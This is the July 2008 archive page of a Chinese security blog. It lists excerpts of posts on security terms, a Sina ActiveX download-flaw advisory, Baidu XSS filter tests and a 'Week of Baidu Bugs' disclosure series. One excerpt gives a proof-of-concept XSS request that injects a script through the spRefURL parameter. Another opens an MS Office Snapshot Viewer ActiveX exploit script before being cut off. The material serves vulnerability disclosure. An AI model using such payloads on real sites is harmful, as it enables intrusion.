2008年7月 的日志

需要明晰的一些概念

来源:大风起兮云飞扬

安全里面有一堆名词,在忽悠别人的时候不要把这些含义搞混了。

辨析如下:

漏洞Vulnerability):软件系统中可以被利用的缺陷。如果不能利用则只是一个bug。
风险Risk):系统被攻击会造成的损失
威胁Threat):系统中漏洞可能会被某人发现。
暴露Exposure):漏洞有多久没修补。

那么简单举例
阅读全文 »

新浪DLoader Class ActiveX控件任意文件下载漏洞

来源:知道安全

发布日期:2008-7-18

最后更新日期:2008-7-18 15:57(GMT)

受影响系统:
Sina UC
新浪网络电视
详细:
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.
阅读全文 »

Tags: , ,

测试百度XSS Filter的一些例子

来源:大风起兮云飞扬

今天有朋友和我讨论了一下关于百度富文本编辑器 XSS Filter的问题,关于过滤规则可以看我之前在WoBB终章里总结的8条规则。

这里我可以把我测试XSS Filter的部分html发一下,希望能帮助到某些朋友。(当然我最终还是没绕过去)

如下:
阅读全文 »

Tags: ,

The Week of Baidu Bugs – Day 07: 终章,谢幕

来源:大风起兮云飞扬

注:版权所有,转载请注明出处。

连续发了这么多天漏洞,到后来有点倦怠了,跨站跨到手软,码字码到吐血

然而我觉得这一切是有意义的,对我自己来说是个总结归纳的过程,对大家来说是个饭后不错的谈资,对百度来说有人免费帮他们做QA测试,所以我看这种活动以后还是要经常开展,比如the Month of Baidu Bugs之类,不过码字好累,最好有人与我勾结勾结,一起狼狈为奸一下。

这次发布了许多漏洞,跨站方面找了15个比较典型的问题,如果真要发,连续发一个月也不是什么难事,不过实在是没精力了。
阅读全文 »

Tags:

The Week of Baidu Bugs – Day 07: 最后的献礼

来源:大风起兮云飞扬

注:版权所有,转载请注明出处。

先把漏洞讲完,再开始扯淡。

今天的第一个漏洞还是出在spRefURL

XSS 13: 百度空间创建文章错误返回XSS漏洞
在写博客的地方,如果提交时篡改spRefURL为恶意脚本,此时若提交失败,则返回页面中会包含我们的恶意脚本。

在创建文章时提交参数如下:
ct=1&cm=2&spBlogID=1f9a3aacaff38d0c4b36d6f5&spBlogCatName_o=%C4%AC%C8%CF%B7%D6%C0%E0&edithid=
&spRefURL=http%3A%2F%2Fhi.baidu.com%2Ftestuser%2Fmodify%2Fblog%2F1f9a3aacaff38d0c4b36d6f5‘)”><script>alert(/XSS/);</script><“(‘
&spBlogTitle=xxxxxxxxxx&spBlogText=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&spBlogCatName=%C4%AC%C8%CF%B7%D6%C0%E0nonexist
&spIsCmtAllow=1&spBlogPower=0&spVcode=&spVerifyKey=&tj=+%B1%A3%B4%E6%D0%DE%B8%C4+
阅读全文 »

Tags:

The Week of Baidu Bugs – Day 06: 百度竞价排名多处XSS漏洞

来源:大风起兮云飞扬

注:版权所有,转载请注明出处。

今天内容比较平淡,都是普通的XSS。

竞价排名是百度的一个子系统,应该是比较赚钱的一个系统。

访问地址是: http://www2.baidu.com

但是这个系统和其他核心模块比起来,安全性要差上很多。

糟糕的验证码设计暂且不说,XSS方面几乎没有防范。

今天讲这个子系统主要是举例下baidu在非核心系统方面对安全考虑和重视程度的欠缺

类似存在缺陷的系统还非常多。就不一个个去挖了,没有挑战性也没什么意思。
阅读全文 »

Tags: , ,

The Week of Baidu Bugs – Day 05: 百度空间多处XSS漏洞

来源:大风起兮云飞扬

注:版权所有,转载请注明出处。

继续我们的XSS之旅,先来看一个YY漏洞

XSS 5: 百度PDC CallBack XSS漏洞
baidu pdc的imstate从名字上来看似乎是用来查询IM在线情况的,正常情况下的一个请求大致如下:
阅读全文 »

Tags: , ,

MS Office Snapshot Viewer ActiveX Exploit (可执行版)

作者:lcx

可执行版,请勿用于非法用途。

<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
 阅读全文 »
Tags: ,